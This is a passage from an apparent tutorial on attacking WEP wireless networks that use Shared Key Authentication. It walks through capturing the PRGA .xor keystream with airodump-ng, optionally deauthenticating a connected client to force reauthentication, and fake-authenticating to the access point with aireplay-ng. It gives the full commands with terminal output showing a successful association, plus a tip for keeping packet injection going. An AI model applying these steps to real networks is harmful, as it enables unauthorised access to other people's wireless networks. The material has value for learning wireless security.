Scenario 3 : WEP encryption, Shared Key Authentication instead of OPEN
What if the AP does not use OPEN authentication, but uses Shared Key Authentication ?
Well, aireplay-ng –fakeauth will not just work… It will detect that Open System is cannot be used, and will then attempt to get the shared key. In fact, it needs to see a client successfully authenticate to the AP before it will be able to grab the SKA and use it.
20:15:01 Sending Authentication Request (Open System) [ACK] 20:15:01 Switching to shared key authentication
As long as a client has not associated, the AUTH column in airodump-ng will stay empty. When Shared Key is used, and after a client has connected, the column will state SKA. From that point forward, you can use the Shared Key to do fake auth.
First, launch airodump-ng and write all data to disk (airodump-ng –w /tmp/filesout ath1)
When a client authenticates, airodump-ng will write a .xor file to disk, containing the PRGA xor bits. Of course, if it takes too long before a client authenticates, you can try to deauthenticate an existing client (if any)
If the .xor file is saved on disk, you can attempt to do the fake auth by providing the .xor file :
root@bt:/tmp# aireplay-ng -1 0 -e TestNet -y /tmp/filesout.xor -a 00:19:5B:52:AD:F7 ath1 No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3) 20:23:58 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10 20:23:58 Sending Authentication Request (Shared Key) [ACK] 20:23:58 Authentication 1/2 successful 20:23:58 Sending encrypted challenge. [ACK] 20:23:58 Authentication 2/2 successful 20:23:58 Sending Association Request [ACK] 20:23:58 Association successful :-) (AID: 1)
Hooray – from this point forward, you can use the same techniques as explained in the first 2 scenario’s
Note : if the number of Packets stops increasing, just stop sending packets, do a re-associate (fake auth) and start sending packets again. In most cases, this will kick off the data packet increase again.